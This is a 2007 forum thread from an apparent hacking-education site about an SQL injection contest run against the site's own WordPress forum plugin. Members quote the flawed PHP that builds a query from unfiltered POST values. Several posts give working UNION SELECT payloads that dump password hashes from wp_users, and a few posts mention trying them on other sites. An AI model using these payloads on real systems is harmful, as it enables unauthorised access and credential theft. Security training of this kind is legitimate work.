| User | Post |
|
11:07 am
November 9, 2007
|
GONZO
| | | |
| Guru | posts 569 |
|
|
I got this:
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1]
SELECT count(*) FROM wp_forum_posts WHERE author_id =
WordPress database error: [You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'ORDER BY date DESC LIMIT 10' at line 1]
SELECT * FROM wp_forum_posts WHERE author_id = ORDER BY date DESC LIMIT 10
im trying stuff in the vid but not working i fell so close but yet so far away.
the page looks like this:
User profile for
(Send email)
Name:
Alias:
Forum Status: Member
Registered: 12-31-1969
Posts:
Web site:
AIM:
Jabber / Google Talk:
Yahoo IM:
Description:
Recent posts:
Search for all user posts
|
|
|
9:10 pm
November 9, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1645 |
|
|
Hey Gonzo look up the difference between Get statements and Post statements. Basically get is variables in the URL ex. http://infinityexists.com/?page_id=5&forumaction=showprofile&user=3
user, forumaction, page_id are all Get variables. Post variables are not visible in the URL. The only way to edit Post variables is have a program to [b]DATA TAMPER[/b] or change it as it leaves your browser. (HINT HINT HINT!)
Also, this forum is riddled with errors just because you found an error doesn't mean you can do sql injection.
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
1:55 am
November 10, 2007
|
N3th4x
| | | |
| Member | posts 29 |
|
|
I managed to get the same errors and profile as GONZO…seems I was barking up the wrong tree as well. I got your hint Patchy, not that it has done me much good. =/ I want that damn t-shirt!!! I am buggy cross-eyed from staring at code, etc. for the last 6 hours…..off to get a little rest. I expect a full breakdown of this if someone solves this before I do…..else I will be going on vacation to the loony bin for awhile. =P
P.S. I wouldn't be mad at another hint or 2 Patchy =P
|
|
|
12:59 pm
November 10, 2007
|
marcel.romard
| | | |
| Newbie | posts 2 |
|
|
I think I found the exploit
the one I found is in the forum search they do not check the value of forum_sort_by or order
just save the page offline and enter your sql code into the option value for forum_sort_by and when you do a search presto
here is the source code that causes the problem as you can see they build the order_by variable without filtering the post and use it directly in the sql statement
$order_by = "ORDER BY ".$_POST['forum_sort_by']." ".$_POST['order'];
$wpdb->hide_errors();
//$out .= "SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by";
$res = $wpdb->get_results("SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by");
|
|
|
1:33 pm
November 10, 2007
|
funkymunky
| | | |
| Member | posts 20 |
|
|
This has completely lost me.
I've been trying all sorts with tamper data but no avail 
Marcel I don't understand what I have to do??
Cheers
|
|
|
1:38 pm
November 10, 2007
|
N3th4x
| | | |
| Member | posts 29 |
|
|
Were you able to produce the password hashes marcel? I have been off on so many different tactics, I have got myself confused. =P Admittedly, I knew next to nothing about SQL before this challenge, so worst case scenario, no t-shirt, but at least I am learning some stuff. =)
|
|
|
3:54 pm
November 10, 2007
|
marcel.romard
| | | |
| Newbie | posts 2 |
|
|
[quote][b]QUOTE[/b] (marcel.romard @ )
I think I found the exploit
the one I found is in the forum search they do not check the value of forum_sort_by or order
just save the page offline and enter your sql code into the option value for forum_sort_by and when you do a search presto
here is the source code that causes the problem as you can see they build the order_by variable without filtering the post and use it directly in the sql statement
$order_by = "ORDER BY ".$_POST['forum_sort_by']." ".$_POST['order'];
$wpdb->hide_errors();
//$out .= "SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by";
$res = $wpdb->get_results("SELECT * FROM $table_posts WHERE text LIKE '%$query%' $cond $order_by");
[/quote]
i was on the right track but i was wrong sorry
the correct var to modify is the forum_query_forum select box
add the union statement there and it will dump the hashes
i just added this option to the forum_query_forum and it works locally but looks like it might be patched on the site
<option value="15) UNION (SELECT null,null,null,null,null,user_pass,null FROM wp_users">sdfsdf</option>
should have remembered that you can't do a union after order by or limit 
Marcel
|
|
|
4:24 pm
November 10, 2007
|
esc
| | | |
| Member | posts 15 |
|
|
i won the T-shirt yupi.
i will email u my address.
marcel.romard i will try to look up u error but i dont have now time.
if is working local i think it will work online two. Try on somesite and see if is working.
Pachy i dont know u email i will msg u in aim.
|
|
|
4:43 pm
November 10, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1645 |
|
|
marcel.romard and esc both won the sql injection challenege! Marcel you found the correct sql injection flaw; however, the challenge was designed for you to enter [i]15) union select null,null,null,null,null,user_pass,null from wp_users#[/i] if you would have put that in the challenge would have told you that you won and recorded your username. O well in real life your union statement would work also. If both of you could email your address to patchy@infinityexists.com we will send you guys a t-shirt. CONGRATS!!
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
4:58 pm
November 10, 2007
|
Patchy
| | Champaign, IL | |
| Admin
| posts 1645 |
|
|
This challenge will be left open for other users to practices Sql Injection. Now should I upload a Vblog on how to complete this challenge or do you guys want to figure it out on our own? (but marcel.romard and I already pretty much gave the whole challenge away)
|
"From the perspective of these infinites, all finites are equal, and I see no reason for fixing our imagination on one rather than on another."n~ Blaise Pascal, Pensées
|
|
|
5:14 pm
November 10, 2007
|
N3th4x
| | | |
| Member | posts 29 |
|
|
Congrats marcel.romard & esc!!! Great contest Patchy. Admittedly way over my head currently. =P Looking forward to the next challenge!!! (Hint, hint!!! )
|
|
|
3:44 am
November 11, 2007
|
funkymunky
| | | |
| Member | posts 20 |
|
|
Well done guys 
I was looking in completely the wrong direction.
I was trying to edit cookies and all sorts, lol
|
|
|
11:22 am
November 11, 2007
|
ToolBust
| | | |
| Newbie | posts 2 |
|
|
I do exactly as you do in the video and it doesn't work…I've tried at other forums but unsucessfuly. why is that?? can you help me?
|
|
|
2:02 am
November 13, 2007
|
127.0.0.1
| | | |
| Member | posts 17 |
|
|
If we find any other flaws that allow us to extract passwords should we post them here?
And now that all the skiddies have gained some understanding of sql injection…
http://imgs.xkcd.com/comics/exploits_of_a_mom.png
|
|
|
1:20 pm
November 13, 2007
|
N3th4x
| | | |
| Member | posts 29 |
|
|
|
2:51 pm
November 13, 2007
|
funkymunky
| | | |
| Member | posts 20 |
|
|
hahaha
127
Patchy when will we have a video about this?
I understand your previous video about SQL injection, and have carried it out successfully, however what should I of been looking for in the Source code telling me the search function was vulnerable??
|
|
|
2:18 am
November 14, 2007
|
127.0.0.1
| | | |
| Member | posts 17 |
|
|
I haven't watched the video but I think the idea is to see where you can send information to the server that it does not check before passing along to the database.
e.g. marcel found this:
$order_by = "ORDER BY ".$_POST[’forum_sort_by’]." ".$_POST[’order’];
$wpdb->hide_errors();
//$out .= "SELECT * FROM $table_posts WHERE text LIKE ‘%$query%’ $cond $order_by";
$res = $wpdb->get_results("SELECT * FROM $table_posts WHERE text LIKE ‘%$query%’ $cond $order_by");
note that $query is passed to the database. Marcel's sploit was:
15) UNION (SELECT null,null,null,null,null,user_pass,null FROM wp_users
(the closing bracket after the '15′ is to close the "like" condition)
Changing what is sent to the query means that you can do things like unions…
so the actual querying function is vulnerable but what you are looking to mess with is the variable that is passed to it.
I hope that made sense…
|
|
|
4:38 am
November 14, 2007
|
funkymunky
| | | |
| Member | posts 20 |
|
|
Oh wow.
I'm doing sql at uni at the minute so it kind of makes sense. But at the same time it doesn't :s lol
|
|
|
4:42 am
November 14, 2007
|
127.0.0.1
| | | |
| Member | posts 17 |
|
|
Say what you don't understand and I'm sure if I can't articulate it someone will be able to…
Good luck with learning it – you'll see it's really basic after a while
|
|
|
4:46 pm
November 19, 2007
|
esc
| | | |
| Member | posts 15 |
|
|
and prize is on the way right?
|
|
Login 
Register 
Search 
Forum
Print this Post 
Topic RSS 
